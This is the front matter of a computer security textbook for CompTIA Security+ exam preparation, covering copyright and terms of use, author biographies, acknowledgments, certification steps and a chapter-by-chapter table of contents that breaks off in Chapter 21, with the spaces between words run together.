Copyright©2016byMcGraw-HillEducation.Allrightsreserved.ExceptaspermittedundertheUnitedStatesCopyrightActof1976,nopartofthispublicationmaybereproducedordistributedinanyformorbyanymeans,orstoredinadatabaseorretrievalsystem,withoutthepriorwrittenpermissionofthepublisher,withtheexceptionthattheprogramlistingsmaybeentered,stored,andexecutedinacomputersystem,buttheymaynotbereproducedforpublication.
ISBN:978-0-07-183597-8MHID:0-07-183597-0
ThematerialinthiseBookalsoappearsintheprintversionofthistitle:ISBN:978-0-07-183601-2,MHID:0-07-183601-2.
eBookconversionbycodeMantraVersion1.0
Alltrademarksaretrademarksoftheirrespectiveowners.Ratherthanputatrademarksymbolaftereveryoccurrenceofatrademarkedname,weusenamesinaneditorialfashiononly,andtothebenefitofthetrademarkowner,withnointentionofinfringementofthetrademark.Wheresuchdesignationsappearinthisbook,theyhavebeenprintedwithinitialcaps.
McGraw-HillEducationeBooksareavailableatspecialquantitydiscountstouseaspremiumsandsalespromotionsorforuseincorporatetrainingprograms.Tocontactarepresentative,pleasevisittheContactUspageatwww.mhprofessional.com.
SANSInstituteITCodeofEthicsreproducedwithpermission,©SANSInstitute.
InformationhasbeenobtainedbyMcGraw-HillEducationfromsourcesbelievedtobereliable.However,becauseofthepossibilityofhumanormechanicalerrorbyoursources,McGraw-HillEducation,orothers,
McGraw-HillEducationdoesnotguaranteetheaccuracy,adequacy,orcompletenessofanyinformationandisnotresponsibleforanyerrorsoromissionsortheresultsobtainedfromtheuseofsuchinformation.
McGraw-HillEducationisanindependententityfromCompTIA®.ThispublicationanddigitalcontentmaybeusedinassistingstudentstopreparefortheCompTIASecurity+exam.NeitherCompTIAnorMcGraw-HillEducationwarrantsthatuseofthispublicationanddigitalcontentwillensurepassinganyexam.CompTIAandCompTIASecurity+aretrademarksorregisteredtrademarksofCompTIAintheUnitedStatesand/orothercountries.Allothertrademarksaretrademarksoftheirrespectiveowners.
TERMSOFUSE
ThisisacopyrightedworkandMcGraw-HillEducationanditslicensorsreserveallrightsinandtothework.Useofthisworkissubjecttotheseterms.ExceptaspermittedundertheCopyrightActof1976andtherighttostoreandretrieveonecopyofthework,youmaynotdecompile,disassemble,reverseengineer,reproduce,modify,createderivativeworksbasedupon,transmit,distribute,disseminate,sell,publishorsublicensetheworkoranypartofitwithoutMcGraw-HillEducation’spriorconsent.Youmayusetheworkforyourownnoncommercialandpersonaluse;anyotheruseoftheworkisstrictlyprohibited.Yourrighttousetheworkmaybeterminatedifyoufailtocomplywiththeseterms.
THEWORKISPROVIDED“ASIS.”McGRAW-HILLEDUCATIONANDITSLICENSORSMAKENOGUARANTEESORWARRANTIESASTOTHEACCURACY,ADEQUACYORCOMPLETENESSOFORRESULTSTOBEOBTAINEDFROMUSINGTHEWORK,INCLUDINGANYINFORMATIONTHATCANBEACCESSEDTHROUGHTHEWORKVIAHYPERLINKOROTHERWISE,ANDEXPRESSLYDISCLAIMANYWARRANTY,EXPRESSORIMPLIED,INCLUDINGBUTNOTLIMITEDTOIMPLIEDWARRANTIESOF
MERCHANTABILITYORFITNESSFORAPARTICULARPURPOSE.McGraw-HillEducationanditslicensorsdonotwarrantorguaranteethatthefunctionscontainedintheworkwillmeetyourrequirementsorthatitsoperationwillbeuninterruptedorerrorfree.NeitherMcGraw-HillEducationnoritslicensorsshallbeliabletoyouoranyoneelseforanyinaccuracy,errororomission,regardlessofcause,intheworkorforanydamagesresultingtherefrom.McGraw-HillEducationhasnoresponsibilityforthecontentofanyinformationaccessedthroughthework.UndernocircumstancesshallMcGraw-HillEducationand/oritslicensorsbeliableforanyindirect,incidental,special,punitive,consequentialorsimilardamagesthatresultfromtheuseoforinabilitytousethework,evenifanyofthemhasbeenadvisedofthepossibilityofsuchdamages.Thislimitationofliabilityshallapplytoanyclaimorcausewhatsoeverwhethersuchclaimorcausearisesincontract,tortorotherwise.
AbouttheAuthorsDr.Wm.ArthurConklinisanassociateprofessorandDirectoroftheCenterforInformationSecurityResearchandEducationintheCollegeofTechnologyattheUniversityofHouston.Heholdstwoterminaldegrees,aPh.D.inBusinessAdministration(specializinginInformationSecurity)fromTheUniversityofTexasatSanAntonio(UTSA)andthedegreeElectricalEngineer(specializinginSpaceSystemsEngineering)fromtheNavalPostgraduateSchoolinMonterey,CA.HeholdsCompTIASecurity+,CISSP,CSSLP,CRISC,DFCP,GICSP,andCASPcertifications.AnISSAFellow,heisalsoaseniormemberofASQandamemberofIEEEandACM.Hisresearchinterestsincludetheuseofsystemstheorytoexploreinformationsecurity,specificallyincyber-physicalsystems.Hehascoauthoredsixsecuritybooksandnumerousacademicarticlesassociatedwithinformationsecurity.HeisactiveintheDHS-sponsoredIndustrialControlSystemsJointWorkingGroup(ICSJWG)effortsassociatedwithworkforcedevelopmentandcybersecurityaspectsofindustrialcontrolsystems.Hehasanextensivebackgroundinsecurecodingandisaformerco-chairoftheDHS/DoDSoftwareAssuranceForumworkinggroupforworkforceeducation,training,anddevelopment.
Dr.GregoryWhitehasbeeninvolvedincomputerandnetworksecuritysince1986.Hespent19yearsonactivedutywiththeU.S.AirForceandiscurrentlyintheAirForceReservesassignedtothePentagon.HeobtainedhisPh.D.inComputerSciencefromTexasA&MUniversityin1995.Hisdissertationtopicwasintheareaofcomputernetworkintrusiondetection,andhecontinuestoconductresearchinthisareatoday.HeiscurrentlytheDirectorfortheCenterforInfrastructureAssuranceandSecurityandisanassociateprofessorofcomputerscienceatTheUniversityofTexasatSanAntonio.Dr.Whitehaswrittenandpresentednumerousarticlesandconferencepapersonsecurity.Heisalsothecoauthorforfivetextbooksoncomputerandnetworksecurityandhaswrittenchaptersfortwoothersecuritybooks.Dr.Whitecontinuestobeactiveinsecurityresearch.His
currentresearchinitiativesincludeeffortsinhigh-speedintrusiondetection,communityinfrastructureprotection,andvisualizationofcommunityandorganizationsecuritypostures.
DwayneWilliamsisAssociateDirector,SpecialProjectsfortheCenterforInfrastructureAssuranceandSecurity(CIAS)attheUniversityofTexasatSanAntonioandhasmorethan22yearsofexperienceininformationsystemsandnetworksecurity.Mr.Williams’sexperienceincludessixyearsofcommissionedmilitaryserviceasaCommunications-ComputerInformationSystemsOfficerintheU.S.AirForce,specializinginnetworksecurity,corporateinformationprotection,intrusiondetectionsystems,incidentresponse,andVPNtechnology.PriortojoiningtheCIAS,heservedasDirectorofConsultingforSecureLogixCorporation,wherehedirectedandprovidedsecurityassessmentandintegrationservicestoFortune100,government,publicutility,oilandgas,financial,andtechnologyclients.Mr.Williamsgraduatedin1993fromBaylorUniversitywithaBachelorofArtsinComputerScience.Mr.WilliamsisaCertifiedInformationSystemsSecurityProfessional(CISSP),CompTIAAdvancedSecurityPractitioner(CASP),andcoauthorofMcGraw-Hill’sVoiceandDataSecurity,CompTIASecurity+All-in-OneExamGuide,andCASPCompTIAAdvancedSecurityPractitionerCertificationStudyGuide.
RogerL.Davis,CISSP,CISM,CISA,isanAccountManagerforMicrosoft.HehasservedaspresidentoftheUtahchapteroftheInformationSystemsSecurityAssociation(ISSA)andvariousboardpositionsfortheUtahchapteroftheInformationSystemsAuditandControlAssociation(ISACA).HeisaretiredAirForcelieutenantcolonelwith35yearsofmilitaryandinformationsystems/securityexperience.Mr.DavisservedonthefacultyofBrighamYoungUniversityandtheAirForceInstituteofTechnology.HecoauthoredMcGraw-Hill’sCompTIASecurity+All-in-OneExamGuideandVoiceandDataSecurity.HeholdsaMaster’sdegreeinComputerSciencefromGeorgeWashingtonUniversity,aBachelor’sdegreeinComputerSciencefromBrigham
YoungUniversity,andperformedpost-graduatestudiesinelectricalengineeringandcomputerscienceattheUniversityofColorado.
ChuckCothren,CISSP,isaPrincipalSolutionsSpecialistatSymantecCorporationapplyingawidearrayofnetworksecurityexperience,includingperformingcontrolledpenetrationtesting,incidentresponse,andsecuritymanagementtoassistawidevarietyofclientsintheprotectionoftheircriticaldata.HehasalsoanalyzedsecuritymethodologiesforVoiceoverInternetProtocol(VoIP)systemsandsupervisorycontrolanddataacquisition(SCADA)systems.HeiscoauthorofthebooksVoiceandDataSecurity,andCompTIASecurity+All-in-OneExamGuide.
AbouttheTechnicalEditorBobbyE.RogersisanInformationSecurityEngineerworkingasacontractorforDepartmentofDefenseagencies,helpingtosecure,certify,andaccredittheirinformationsystems.Hisdutiesincludeinformationsystemsecurityengineering,riskmanagement,andcertificationandaccreditationefforts.Heretiredafter21yearsintheUnitedStatesAirForce,servingasanetworksecurityengineerandinstructor,andhassecurednetworksallovertheworld.BobbyhasaMaster’sdegreeinInformationAssurance(IA),andispursuingadoctoraldegreeinCybersecurityfromCapitolTechnologyUniversity,Maryland.HismanycertificationsincludeCRISC,CISSP-ISSEP,C|EH,andMCSE:SecurityaswellastheCompTIAA+,Network+,Security+,andMobility+certifications.
AcknowledgmentsThisbookisdedicatedtothemanysecurityprofessionalswhodaily
worktoensurethesafetyofournation’scriticalinfrastructures.Wewanttorecognizethethousandsofdedicatedindividualswhostrivetoprotect
ournationalassetsbutwhoseldomreceivepraiseandoftenareonlynoticedwhenanincidentoccurs.Toyou,wesaythankyouforajobwell
done!
We,theauthorsofPrinciplesofComputerSecurity,FourthEdition,havemanyindividualswhoweneedtoacknowledge—individualswithoutwhomthiseffortwouldnothavebeensuccessful.ThiseditionwouldnothavebeenpossiblewithoutTimGreen,whosesupportandfaithintheauthorsmadethiseditionpossible.Hebroughttogetheranall-starproductionteamthatmadethisbookmorethanjustanewedition,butacompletelearningsystem.ThelistneedstostartwiththosefolksatMcGraw-HillEducationwho
workedtirelesslywiththeproject’smultipleauthorsandcontributorsandledussuccessfullythroughtheminefieldthatisabookscheduleandwhotookourroughchaptersanddrawingsandturnedthemintoafinal,professionalproductwecanbeproudof.WethankallthegoodpeoplefromtheAcquisitionsteam,TimGreenandAmyStonebraker;fromtheEditorialServicesteam,JodyMcKenzieandHowieSeverson;fromtheIllustrationandProductionteams,JamesKussowandAmarjeetKumarandthecompositionteamatCenveoPublisherServices.Wealsothankthetechnicaleditor,BobbyRogers;thecopyeditor,BillMcManus;theproofreader,PaulTyler;andtheindexer,JackLewis;foralltheirattentiontodetailthatmadethisafinerworkaftertheyfinishedwithit.Wealsoneedtoacknowledgeourcurrentemployerswho,toourgreat
delight,haveseenfittopayustoworkinacareerfieldthatweallfindexcitingandrewarding.Thereisneveradullmomentinsecurity,becauseitisconstantlychanging.WewouldliketothankArtConklinforherdingthecatsonthisone.
Finally,wewouldeachliketoindividuallythankthosepeoplewho—onapersonalbasis—haveprovidedthecoresupportforusindividually.Withoutthesespecialpeopleinourlives,noneofuscouldhaveputthisworktogether.
—TheAuthorTeam
ToSusan,yourloveandsupportiswhatenablesmetodoallthethingsIdo.
—ArtConklin,Ph.D.Iwouldliketothankmywife,Charlan,forthetremendoussupportshehasalwaysgivenme.Itdoesn’tmatterhowmanytimesIhaveswornthatI’llnevergetinvolvedwithanotherbookprojectonlytoreturnwithinmonthstoyetanotherone;throughitall,shehasremainedsupportive.IwouldalsoliketopubliclythanktheUnitedStatesAirForce,which
providedmenumerousopportunitiessince1986tolearnmoreaboutsecuritythanIeverknewexisted.Towhoeveritwaswhodecidedtosendmeasayoungcaptain—freshfromcompletingmymaster’sdegreeinartificialintelligence—tomyfirstassignmentincomputersecurity:thankyou,ithasbeenagreatadventure!
—GregoryB.White,Ph.D.Josie,thankyouforalltheloveandsupport.Macon,John,thisisforyou.
—ChuckCothrenGeena,thanksforbeingmybestfriendandmygreatestsupport.AnythingIamisbecauseofyou.Lovetomykidsandgrandkids!
—RogerL.DavisTomywifeandbestfriend,Leah,foryourlove,energy,andsupport—thankyouforalwaysbeingthere.Here’stomanymoreyearstogether.
—DwayneWilliams
ABOUTTHISBOOK
ImportantTechnologySkillsInformationtechnology(IT)offersmanycareerpaths,andinformationsecurityisoneofthefastest-growingtracksforITprofessionals.Thisbookprovidescoverageofthematerialsyouneedtobeginyourexplorationofinformationsecurity.InadditiontocoveringalloftheCompTIASecurity+examobjectives,additionalmaterialisincludedtohelpyoubuildasolidintroductoryknowledgeofinformationsecurity.
ProvenLearningMethodKeepsYouonTrackDesignedforclassroomuseandwrittenbyinstructorsforuseintheirownclasses,PrinciplesofComputerSecurityisstructuredtogiveyoucomprehensiveknowledgeofinformationsecurity.Thetextbook’sactivelearningmethodologyguidesyoubeyondmererecalland—throughthought-provokingactivities,labs,andsidebars—helpsyoudevelopcritical-thinking,diagnostic,andcommunicationskills.
EffectiveLearningToolsThisfeature-richtextbookisdesignedtomakelearningeasyandenjoyableandtohelpyoudeveloptheskillsandcritical-thinkingabilitiesthatwillenableyoutoadapttodifferentjobsituationsandtotroubleshootproblems.Writtenbyinstructorswithdecadesofcombinedinformationsecurityexperience,thisbookconveyseventhemostcomplexissuesinanaccessible,easy-tounderstandformat.
Eachchapterincludes
LearningObjectivesthatsetmeasurablegoalsforchapter-by-chapterprogress
Illustrationsthatgiveyouaclearpictureoftheconceptsandtechnologies
TryThis!,CrossCheck,andTechTipsidebarsthatencourageyoutopracticeandapplyconceptsinreal-worldsettings
Notes,Tips,andWarningsthatguideyou,andExamTipsthatgiveyouadviceorprovideinformationspecificallyrelatedtopreparingfortheexam
ChapterSummariesandKeyTermsListsthatprovideyouwithaneasywaytoreviewimportantconceptsandvocabulary
ChallengingEnd-of-ChapterTeststhatincludevocabulary-buildingexercises,multiple-choicequestions,essayquestions,andon-the-joblabprojects
CompTIAAPPROVEDQUALITYCONTENT
ItPaystoGetCertifiedInadigitalworld,digitalliteracyisanessentialsurvivalskill.Certificationdemonstratesthatyouhavetheknowledgeandskilltosolvetechnicalorbusinessproblemsinvirtuallyanybusinessenvironment.CompTIAcertificationsarehighlyvaluedcredentialsthatqualifyyouforjobs,increasedcompensation,andpromotion.
CompTIASecurity+CertificationHelpsYour
Career
Securityisoneofthehighestdemandjobcategories,growinginimportanceasthefrequencyandseverityofsecuritythreatscontinuestobeamajorconcernfororganizationsaroundtheworld.
Jobsforsecurityadministratorsareexpectedtoincreaseby18%—theskillsetrequiredforthesetypesofjobsmapstotheCompTIASecurity+certification.
NetworkSecurityAdministratorscanearnasmuchas$106,000peryear.
CompTIASecurity+isthefirststepinstartingyourcareerasaNetworkSecurityAdministratororSystemsSecurityAdministrator.
Morethan250,000individualsworldwideareCompTIASecurity+certified.
CompTIASecurity+isregularlyusedinorganizationssuchasHitachiSystems,FujiXerox,HP,Dell,andavarietyofmajorU.S.governmentcontractors.
ApprovedbytheU.S.DepartmentofDefense(DoD)asoneoftherequiredcertificationoptionsintheDoD8570.01-Mdirective,forInformationAssuranceTechnicalLevelIIandManagementLevelIjobroles.
StepstoGettingCertifiedandStayingCertified1.Reviewtheexamobjectives.Reviewthecertificationobjectivesto
makesureyouknowwhatiscoveredintheexam:http://certification.comptia.org/examobjectives.aspx
2.Practicefortheexam.Afteryouhavestudiedforthecertificationexam,reviewandanswersamplequestionstogetanideaofwhattypeofquestionsmightbeontheexam:http://certification.comptia.org/samplequestions.aspx
3.Purchaseanexamvoucher.YoucanpurchaseexamvouchersontheCompTIAMarketplace,www.comptiastore.com.
4.Takethetest!GotothePearsonVUEwebsite,www.pearsonvue.com/comptia/,andscheduleatimetotakeyourexam.
5.Staycertified!EffectiveJanuary1,2011,newCompTIASecurity+certificationsarevalidforthreeyearsfromthedateofcertification.Thereareanumberofwaysthecertificationcanberenewed.Formoreinformationgotohttp://certification.comptia.org/ce.
ForMoreInformationVisitCompTIAonlineGotohttp://certification.comptia.org/home.aspxtolearnmoreaboutgettingCompTIAcertified.
ContactCompTIAPleasecall866-835-8020andchooseOption2,ore-mail[emailprotected].
ConnectwithCompTIAFindCompTIAonFacebook,LinkedIn,Twitter,andYouTube.
mailto:[emailprotected]
ContentSealofQualityThiscoursewarebearsthesealofCompTIAApprovedQualityContent.Thissealsignifiesthiscontentcovers100percentoftheexamobjectivesandimplementsimportantinstructionaldesignprinciples.CompTIArecommendsmultiplelearningtoolstohelpincreasecoverageofthelearningobjectives.
CAQCDisclaimerThelogooftheCompTIAApprovedQualityContent(CAQC)programandthestatusofthisorothertrainingmaterialas“Approved”undertheCompTIAApprovedQualityContentprogramsignifiesthat,inCompTIA’sopinion,suchtrainingmaterialcoversthecontentofCompTIA’srelatedcertificationexam.ThecontentsofthistrainingmaterialwerecreatedfortheCompTIA
Security+examcoveringCompTIAcertificationobjectivesthatwerecurrentasofthedateofpublication.CompTIAhasnotreviewedorapprovedtheaccuracyofthecontentsof
thistrainingmaterialandspecificallydisclaimsanywarrantiesofmerchantabilityorfitnessforaparticularpurpose.CompTIAmakesnoguaranteeconcerningthesuccessofpersonsusinganysuch“Approved”orothertrainingmaterialinordertoprepareforanyCompTIAcertificationexam.
CONTENTSATAGLANCE
Chapter1 IntroductionandSecurityTrends
Chapter2 GeneralSecurityConcepts
Chapter3 OperationalandOrganizationalSecurity
Chapter4 TheRoleofPeopleinSecurity
Chapter5 Cryptography
Chapter6 PublicKeyInfrastructure
Chapter7 PKIStandardsandProtocols
Chapter8 PhysicalSecurity
Chapter9 NetworkFundamentals
Chapter10 InfrastructureSecurity
Chapter11 AuthenticationandRemoteAccess
Chapter12 WirelessSecurityandMobileDevices
Chapter13 IntrusionDetectionSystemsandNetworkSecurity
Chapter14 SystemHardeningandBaselines
Chapter15 TypesofAttacksandMaliciousSoftware
Chapter16 E-MailandInstantMessaging
Chapter17 WebComponents
Chapter18 SecureSoftwareDevelopment
Chapter19 BusinessContinuityandDisasterRecovery,andOrganizationalPolicies
Chapter20 RiskManagement
Chapter21 ChangeManagement
Chapter22 IncidentResponse
Chapter23 ComputerForensics
Chapter24 LegalIssuesandEthics
Chapter25 Privacy
AppendixA CompTIASecurity+ExamObjectives:SY0-401
AppendixB AbouttheDownload
Glossary
Index
CONTENTS
ForewordPrefaceIntroductionInstructorWebSite
Chapter1IntroductionandSecurityTrendsTheComputerSecurityProblem
DefinitionofComputerSecurityHistoricalSecurityIncidentsTheCurrentThreatEnvironmentThreatstoSecuritySecurityTrends
TargetsandAttacksSpecificTargetOpportunisticTargetMinimizingPossibleAvenuesofAttack
ApproachestoComputerSecurityEthicsAdditionalReferencesChapter1Review
Chapter2GeneralSecurityConceptsBasicSecurityTerminology
SecurityBasics
SecurityTenetsSecurityApproachesSecurityPrinciplesAccessControlAuthenticationMechanismsAuthenticationandAccessControlPolicies
SecurityModelsConfidentialityModelsIntegrityModels
Chapter2Review
Chapter3OperationalandOrganizationalSecurityPolicies,Procedures,Standards,andGuidelines
SecurityPoliciesChangeManagementPolicyDataPoliciesHumanResourcesPoliciesDueCareandDueDiligenceDueProcessIncidentResponsePoliciesandProcedures
SecurityAwarenessandTrainingSecurityPolicyTrainingandProceduresRole-BasedTrainingCompliancewithLaws,BestPractices,andStandardsUserHabitsNewThreatsandSecurityTrends/AlertsTrainingMetricsandCompliance
InteroperabilityAgreementsServiceLevelAgreementsBusinessPartnershipAgreement
MemorandumofUnderstandingInterconnectionSecurityAgreement
TheSecurityPerimeterPhysicalSecurity
PhysicalAccessControlsPhysicalBarriers
EnvironmentalIssuesFireSuppression
WirelessElectromagneticEavesdropping
ModernEavesdroppingChapter3Review
Chapter4TheRoleofPeopleinSecurityPeople—ASecurityProblem
SocialEngineeringPoorSecurityPractices
PeopleasaSecurityToolSecurityAwarenessSecurityPolicyTrainingandProcedures
Chapter4Review
Chapter5CryptographyCryptographyinPractice
FundamentalMethodsComparativeStrengthsandPerformanceofAlgorithms
HistoricalPerspectivesSubstitutionCiphersOne-TimePads
AlgorithmsKeyManagementRandomNumbers
HashingFunctionsSHARIPEMDMessageDigestHashingSummary
SymmetricEncryptionDES3DESAESCASTRCBlowfishTwofishIDEABlockvs.StreamSymmetricEncryptionSummary
AsymmetricEncryptionDiffie-HellmanRSAElGamalECCAsymmetricEncryptionSummarySymmetricvs.Asymmetric
QuantumCryptographySteganographyCryptographyAlgorithmUse
ConfidentialityIntegrity
AuthenticationNonrepudiationCipherSuitesKeyExchangeKeyEscrowSessionKeysEphemeralKeysKeyStretchingSecrecyPrinciplesTransportEncryptionDigitalSignaturesDigitalRightsManagementCryptographicApplicationsUseofProvenTechnologies
Chapter5Review
Chapter6PublicKeyInfrastructureTheBasicsofPublicKeyInfrastructuresCertificateAuthoritiesRegistrationAuthorities
LocalRegistrationAuthoritiesDigitalCertificates
CertificateExtensionsCertificateAttributes
CertificateLifecyclesRegistrationandGenerationCSRRenewalSuspensionRevocation
KeyDestructionCertificateRepositoriesTrustandCertificateVerificationCentralizedandDecentralizedInfrastructures
HardwareSecurityModulesPrivateKeyProtectionKeyRecoveryKeyEscrow
PublicCertificateAuthoritiesIn-HouseCertificateAuthorities
ChoosingBetweenaPublicCAandanIn-HouseCAOutsourcedCertificateAuthoritiesTyingDifferentPKIsTogetherTrustModels
Certificate-BasedThreatsStolenCertificates
Chapter6Review
Chapter7PKIStandardsandProtocolsPKIXandPKCS
PKIXStandardsPKCSWhyYouNeedtoKnowthePKIXandPKCSStandards
X.509SSL/TLSCipherSuitesISAKMPCMPXKMSS/MIME
IETFS/MIMEHistoryIETFS/MIMEv3Specifications
PGPHowPGPWorks
HTTPSIPsecCEPOtherStandards
FIPSCommonCriteriaWTLSISO/IEC27002(FormerlyISO17799)SAML
Chapter7Review
Chapter8PhysicalSecurityTheSecurityProblemPhysicalSecuritySafeguards
WallsandGuardsPhysicalAccessControlsandMonitoringConvergencePoliciesandProceduresEnvironmentalControls
FireSuppressionWater-BasedFireSuppressionSystemsHalon-BasedFireSuppressionSystemsClean-AgentFireSuppressionSystemsHandheldFireExtinguishersFireDetectionDevices
PowerProtection
UPSBackupPowerandCableShieldingElectromagneticInterference
ElectronicAccessControlSystemsAccessTokens
Chapter8Review
Chapter9NetworkFundamentalsNetworkArchitecturesNetworkTopologyNetworkProtocols
ProtocolsPackets
InternetProtocolIPPacketsTCPvs.UDPICMP
IPv4vs.IPv6PacketDelivery
EthernetLocalPacketDeliveryRemotePacketDeliveryIPAddressesandSubnettingNetworkAddressTranslation
SecurityZonesDMZInternetIntranetExtranetFlatNetworks
EnclavesVLANsZonesandConduits
TunnelingStorageAreaNetworks
iSCSIFibreChannelFCoE
Chapter9Review
Chapter10InfrastructureSecurityDevices
WorkstationsServersVirtualizationMobileDevicesDeviceSecurity,CommonConcernsNetworkAttachedStorageRemovableStorage
NetworkingNetworkInterfaceCardsHubsBridgesSwitchesRoutersFirewallsHowDoFirewallsWork?Next-GenerationFirewallsWebApplicationFirewallsvs.NetworkFirewallsConcentrators
WirelessDevicesModemsTelephonyVPNConcentrator
SecurityDevicesIntrusionDetectionSystemsNetworkAccessControlNetworkMonitoring/DiagnosticLoadBalancersProxiesWebSecurityGatewaysInternetContentFiltersDataLossPreventionUnifiedThreatManagement
MediaCoaxialCableUTP/STPFiberUnguidedMedia
RemovableMediaMagneticMediaOpticalMediaElectronicMedia
SecurityConcernsforTransmissionMediaPhysicalSecurityConcernsCloudComputing
PrivatePublicHybridCommunitySoftwareasaService
PlatformasaServiceInfrastructureasaService
Chapter10Review
Chapter11AuthenticationandRemoteAccessUser,Group,andRoleManagement
UserGroupRole
PasswordPoliciesDomainPasswordPolicy
SingleSign-OnTimeofDayRestrictionsTokensAccountandPasswordExpiration
SecurityControlsandPermissionsAccessControlListsMandatoryAccessControl(MAC)DiscretionaryAccessControl(DAC)Role-BasedAccessControl(RBAC)Rule-BasedAccessControlAttributeBasedAccessControl(ABAC)AccountExpiration
PreventingDataLossorTheftTheRemoteAccessProcess
IdentificationAuthenticationAuthorizationAccessControl
RemoteAccessMethods
IEEE802.1XRADIUSTACACS+AuthenticationProtocolsFTP/FTPS/SFTPVPNsIPsecVulnerabilitiesofRemoteAccessMethods
ConnectionSummaryChapter11Review
Chapter12WirelessSecurityandMobileDevicesIntroductiontoWirelessNetworkingMobilePhones
WirelessApplicationProtocol3GMobileNetworks4GMobileNetworks
BluetoothBluetoothAttacks
NearFieldCommunicationIEEE802.11Series
802.11:IndividualStandardsAttacking802.11CurrentSecurityMethods
WirelessSystemsConfigurationAntennaTypesAntennaPlacementPowerLevelControlsSiteSurveysCaptivePortals
SecuringPublicWi-FiMobileDevices
MobileDeviceSecurityBYODConcernsLocationServicesMobileApplicationSecurity
Chapter12Review
Chapter13IntrusionDetectionSystemsandNetworkSecurityHistoryofIntrusionDetectionSystemsIDSOverview
IDSModelsSignaturesFalsePositivesandFalseNegatives
Network-BasedIDSsAdvantagesofaNIDSDisadvantagesofaNIDSActivevs.PassiveNIDSsNIDSTools
Host-BasedIDSsAdvantagesofHIDSsDisadvantagesofHIDSsActivevs.PassiveHIDSsResurgenceandAdvancementofHIDSs
IntrusionPreventionSystemsHoneypotsandHoneynetsTools
ProtocolAnalyzerSwitchedPortAnalyzerPortScanner
Passivevs.ActiveToolsBannerGrabbing
Chapter13Review
Chapter14SystemHardeningandBaselinesOverviewofBaselinesOperatingSystemandNetworkOperatingSystemHardening
OSSecurityHostSecurity
MachineHardeningOperatingSystemSecurityandSettingsOSHardeningHardeningMicrosoftOperatingSystemsHardeningUNIX-orLinux-BasedOperatingSystemsUpdates(a.k.a.Hotfixes,ServicePacks,andPatches)AntimalwareWhiteListingvs.BlackListingApplicationsTrustedOSHost-basedFirewallsHardwareSecurityHostSoftwareBaselining
Host-BasedSecurityControlsHardware-BasedEncryptionDevicesDataEncryptionDataSecurityHandlingBigDataCloudStorageStorageAreaNetworkPermissions/ACL
NetworkHardening
SoftwareUpdatesDeviceConfigurationSecuringManagementInterfacesVLANManagementIPv4vs.IPv6
ApplicationHardeningApplicationConfigurationBaselineApplicationPatchesPatchManagementHostSoftwareBaselining
GroupPoliciesSecurityTemplatesAlternativeEnvironments
SCADAEmbeddedSystemsPhonesandMobileDevicesMainframeGameConsolesIn-VehicleComputingSystemsAlternativeEnvironmentMethodsNetworkSegmentationSecurityLayersApplicationFirewallsManualUpdatesFirmwareVersionControlWrappersControlRedundancyandDiversity
Chapter14Review
Chapter15TypesofAttacksandMaliciousSoftware
AvenuesofAttackMinimizingPossibleAvenuesofAttack
MaliciousCodeVirusesWormsPolymorphicMalwareTrojanHorsesRootkitsLogicBombsSpywareAdwareBotnetsBackdoorsandTrapdoorsRansomwareMalwareDefenses
AttackingComputerSystemsandNetworksDenial-of-ServiceAttacksSocialEngineeringNullSessionsSniffingSpoofingTCP/IPHijackingMan-in-the-MiddleAttacksReplayAttacksTransitiveAccessSpamSpimPhishingSpearPhishingVishingPharming
ScanningAttacksAttacksonEncryptionAddressSystemAttacksCachePoisoningPasswordGuessingPass-the-HashAttacksSoftwareExploitationClient-SideAttacks
AdvancedPersistentThreatRemoteAccessTrojans
ToolsMetasploitBackTrack/KaliSocial-EngineeringToolkitCobaltStrikeCoreImpactBurpSuite
AuditingPerformRoutineAudits
Chapter15Review
Chapter16E-MailandInstantMessagingHowE-MailWorks
E-MailStructureMIME
SecurityofE-MailMaliciousCodeHoaxE-MailsUnsolicitedCommercialE-Mail(Spam)SenderIDFramework
DomainKeysIdentifiedMailMailEncryption
S/MIMEPGP
InstantMessagingModernInstantMessagingSystems
Chapter16Review
Chapter17WebComponentsCurrentWebComponentsandConcernsWebProtocols
Encryption(SSLandTLS)TheWeb(HTTPandHTTPS)HTTPSEverywhereHTTPStrictTransportSecurityDirectoryServices(DAPandLDAP)FileTransfer(FTPandSFTP)Vulnerabilities
Code-BasedVulnerabilitiesBufferOverflowsJavaJavaScriptActiveXSecuringtheBrowserCGIServer-SideScriptsCookiesBrowserPlug-insMaliciousAdd-onsSignedApplets
Application-BasedWeaknessesSessionHijackingClient-SideAttacksWeb2.0andSecurity
Chapter17Review
Chapter18SecureSoftwareDevelopmentTheSoftwareEngineeringProcess
ProcessModelsSecureDevelopmentLifecycle
SecureCodingConceptsErrorandExceptionHandlingInputandOutputValidationFuzzingBugTracking
ApplicationAttacksCross-SiteScriptingInjectionsDirectoryTraversal/CommandInjectionBufferOverflowIntegerOverflowCross-SiteRequestForgeryZero-DayAttachmentsLocallySharedObjectsClient-SideAttacksArbitrary/RemoteCodeExecutionOpenVulnerabilityandAssessmentLanguage
ApplicationHardeningApplicationConfigurationBaseline
ApplicationPatchManagementNoSQLDatabasesvs.SQLDatabasesServer-Sidevs.Client-SideValidation
Chapter18Review
Chapter19BusinessContinuityandDisasterRecovery,andOrganizationalPolicies
BusinessContinuityBusinessContinuityPlansBusinessImpactAnalysisIdentificationofCriticalSystemsandComponentsRemovingSinglePointsofFailureRiskAssessmentSuccessionPlanningContinuityofOperations
DisasterRecoveryDisasterRecoveryPlans/ProcessCategoriesofBusinessFunctionsITContingencyPlanningTest,Exercise,andRehearseRecoveryTimeObjectiveandRecoveryPointObjectiveBackupsAlternativeSitesUtilitiesSecureRecoveryCloudComputingHighAvailabilityandFaultToleranceFailureandRecoveryTiming
Chapter19Review
Chapter20RiskManagementAnOverviewofRiskManagement
ExampleofRiskManagementattheInternationalBankingLevelRiskManagementVocabulary
WhatIsRiskManagement?RiskManagementCulture
BusinessRisksExamplesofBusinessRisksExamplesofTechnologyRisks
RiskMitigationStrategiesChangeManagementIncidentManagementUserRightsandPermissionsReviewsDataLossorTheft
RiskManagementModelsGeneralRiskManagementModelSoftwareEngineeringInstituteModelNISTRiskModelsModelApplication
QualitativelyAssessingRiskQuantitativelyAssessingRisk
AddingObjectivitytoaQualitativeAssessmentRiskCalculation
Qualitativevs.QuantitativeRiskAssessmentTools
Cost-EffectivenessModelingRiskManagementBestPractices
SystemVulnerabilitiesThreatVectorsProbability/ThreatLikelihood
Risk-Avoidance,Transference,Acceptance,Mitigation,DeterrenceRisksAssociatedwithCloudComputingandVirtualization
Chapter20Review
Chapter21ChangeManagementWhyChangeManagement?TheKeyConcept:SeparationofDutiesElementsofChangeManagementImplementingChangeManagement
Back-outPlanThePurposeofaChangeControlBoard
